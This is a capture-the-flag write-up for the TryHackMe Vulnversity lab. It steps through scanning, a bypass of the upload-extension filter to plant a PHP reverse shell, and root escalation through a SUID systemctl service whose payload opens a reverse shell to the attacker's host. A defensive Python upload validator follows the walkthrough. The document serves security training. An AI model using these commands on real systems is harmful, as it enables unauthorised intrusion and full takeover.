TryHackMe | Vulnversity Write-up / Walkthrough (English)
Room Link: https://tryhackme.com/r/room/vulnversity
==============================================================
- sudo nmap IP -vv -Pn shows 6 open ports. Then run sudo nmap IP -vv -Pn -A to get more information about the open ports on the target.
- The proxy is running on port 3128 and its version is 3.5.12.
- The OS is Ubuntu; you can read this from the -sV output for port 22.
- The web server is running on port 3333.
- gobuster dir -w /usr/share/dirb/wordlists/common.txt -u http://IP:3333/ finds the directory with the upload form: /internal/.
- Now you want to upload a shell to the website; however, if you try to upload a .php shell the website tells you that this file type is not allowed. You need to try the other PHP extensions: .php (keep this one for reference), .php3, .php4, .php5, .phtml. Save these 5 extensions in a file called phpext, one extension per line.
- cp /usr/share/webshells/php/php-reverse-shell.php shell.php
- Open Burp Suite, turn on Intercept, and point FoxyProxy at Burp Suite in your browser. Go to the upload page, upload your PHP shell, and intercept the request.
- To test the 5 different extensions, send this request to Intruder. Choose the attack type Sniper, click Clear § and then Add § around the extension in the filename, so that the file extension is the changing value in each request.
- Go to the Payloads tab and load the phpext list you made; make sure to disable payload encoding. Now start the attack.
- Analyse the response to each request to see which type worked. This is the response for a request that got blocked:
- And this is the response for an accepted one:
The accepted one is the .phtml request.
- Now that you know .phtml is the accepted type, change the extension of your shell (mv shell.php shell.phtml) and reupload it to the /internal/ directory.
- Set up a listener: nc -nlvp port. To get a shell back to your machine you need to visit your uploaded shell on the website, but where is it? If you look at the request you sent when uploading, you will see it goes to /internal/index.php, which is the same as /internal/. So run gobuster dir -w /usr/share/dirb/wordlists/common.txt -u http://IP:3333/internal/; this scan gives us /uploads. From there click on shell.phtml to launch your reverse shell (don't forget to turn off the proxy :).
- Run /bin/bash -i, then cd /home and list the contents of this folder to get the users on this system: bill. cd bill, then retrieve the user flag✨.
- Now to the privilege escalation. The room already tells you that the SUID bit is what to look at: find / -perm /4000 2>/dev/null. /bin/systemctl is SUID, and you can use it to get a root shell. This is an amazing reference: https://alvinsmith.gitbook.io/progressive-oscp/untitled/vulnversity-privilege-escalation
First, create your payload on your local machine:
[Unit]
Description=roooooooooot
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/LocalIP/9999 0>&1'
[Install]
WantedBy=multi-user.target
Save it as root.service.
- cd /tmp on the victim's machine. Host a Python HTTP server on your machine and use wget to download the root.service file onto the victim's machine.
- Run nc -nlvp 9999 on your machine. On the victim's machine run /bin/systemctl enable /tmp/root.service, then /bin/systemctl start root. You will now get a root shell back on the listener on your machine. cd /root and retrieve the flag✨.
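The upload form in this room blocked .php but accepted .phtml, which is the classic failure of an extension denylist. The Python below is an added defensive illustration (not code from the room or from this write-up): it contrasts a denylist check modelled on the behaviour observed above with an allowlist validator that also checks the file's magic bytes. The five probed extensions are the ones from the Intruder step; the extra filenames and byte strings are constructed for the example.

```python
import re

# Extensions probed with Burp Intruder in the steps above.
PROBED = ["shell.php", "shell.php3", "shell.php4", "shell.php5", "shell.phtml"]
# Further names a defender should expect (constructed for this example).
EXTRA = ["SHELL.PHTML", "avatar.jpg.phtml", "shell.php.", "../photo.png", "photo.PNG"]

def denylist_allows(filename: str) -> bool:
    """Weak check modelled on the room's form: only a literal '.php' suffix
    is blocked, so .php3/.php4/.php5/.phtml all slip through."""
    return not filename.endswith(".php")

ALLOWED = {"jpg", "jpeg", "png", "gif"}
# One base name, one dot, one short extension: no path separators, no double
# extensions, no trailing dots, no whitespace or control characters.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.[A-Za-z0-9]{1,5}")
MAGIC = {"jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff",
         "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8"}

def allowlist_allows(filename: str, data: bytes = b"") -> bool:
    """Hardened check: the extension must be on the allowlist (case-folded),
    and when the file body is given its magic bytes must match that type."""
    if not SAFE_NAME.fullmatch(filename):
        return False
    ext = filename.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED:
        return False
    return not data or data.startswith(MAGIC[ext])

def compare(names):
    """Map each filename to (denylist verdict, allowlist verdict)."""
    return {n: (denylist_allows(n), allowlist_allows(n)) for n in names}

if __name__ == "__main__":
    for name, (weak, strong) in compare(PROBED + EXTRA).items():
        print(f"{name:18} denylist={'accept' if weak else 'block':6} "
              f"allowlist={'accept' if strong else 'block'}")
```

The magic-byte check matters because an allowlisted extension alone still lets a PHP script through if the server ever maps uploaded files to an interpreter by content or by a later rename.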